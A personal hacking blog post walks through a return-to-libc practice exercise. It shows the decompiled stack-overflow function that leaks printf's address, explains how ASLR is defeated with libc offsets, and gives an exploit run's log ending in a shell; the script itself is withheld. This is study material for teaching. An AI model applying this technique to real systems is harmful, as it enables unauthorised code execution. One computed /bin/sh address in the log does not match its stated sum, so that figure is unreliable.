«   2019/11   »
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Tags
more
Archives
Today
5
Total
9,107
관리 메뉴

J0N9HYUN

RTL PRACTICE 본문

창고/Hacking

RTL PRACTICE

j0n9hyun 2018.11.08 02:50

The Last RTL

RTL for freshman

int __cdecl main(int argc, const char **argv, const char **envp)
{
  return vuln();
}

main function is so simple. let's go into the vuln function

ssize_t vuln()
{
  int buf; // [esp+Ah] [ebp-3Eh]
  int v2; // [esp+Eh] [ebp-3Ah]
  __int16 v3; // [esp+12h] [ebp-36h]
  int v4; // [esp+38h] [ebp-10h]
  void *v5; // [esp+3Ch] [ebp-Ch]

  buf = 0;
  v2 = 0;
  v4 = 0;
  memset(
    (void *)((unsigned int)&v3 & 0xFFFFFFFC),
    0,
    4 * (((unsigned int)((char *)&v2 - ((unsigned int)&v3 & 0xFFFFFFFC) + 46) & 0xFFFFFFFC) >> 2));
  v5 = dlsym((void *)0xFFFFFFFF, "printf");
  printf("Printf() address : %p\n", v5);
  return read(0, &buf, 0x64u);
}

It may be complicated, but it's unexpectedly simple.
You don't need to see everything, just have to look at the printf function. 

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc       
Printf() address : 0xf7df6670

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc
Printf() address : 0xf7dd1670

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc
Printf() address : 0xf7e1b670

you run the binary file, the address will continue to be randomized because of ASLR.
so, we solve this problem by using the offset of the function. The code below shows a successful exploit.
I didn't upload the exploit code separately because it is going to be used as a lesson plan to teach freshman later. 

[+] Starting local process './ret2libc': pid 25104
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

 *** Exploit Process ***
[*] printf_addr = 0xf7e45670
[*] printf_offset = 0x49670
[*] system_offset = 0x3ada0
[*] binsh_offset = 0x15ba0b

[*] libc_base_addr(0xf7dfc000) = printf_addr(0xf7e45670) - printf_offset(0x49670)
[*] system_addr(0xf7e36da0) = libc_base_addr(0xf7dfc000) + system_offset(0x3ada0)
[*] binsh_addr(0xf7ca05f5) = libc_base_addr(0xf7dfc000) + binsh_offset(0x15ba0b)
[*] binsh_addr[onegadget ver] = 0xf7e36c5c

*** Return To Library ***
[+] 66 bytes padding...
[+] Adding System Address...
[+] Adding 4 bytes of argument...
[+] Adding binsh Address...

[*] Paused (press any to continue)
[$] Exploit Success!
[*] Switching to interactive mode
$ id
uid=1000(j0n9hyun) gid=1000(j0n9hyun) groups=1000(j0n9hyun),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),113(lpadmin),128(sambashare)


'창고 > Hacking' 카테고리의 다른 글

RTL PRACTICE  (0) 2018.11.08
0 Comments
댓글쓰기 폼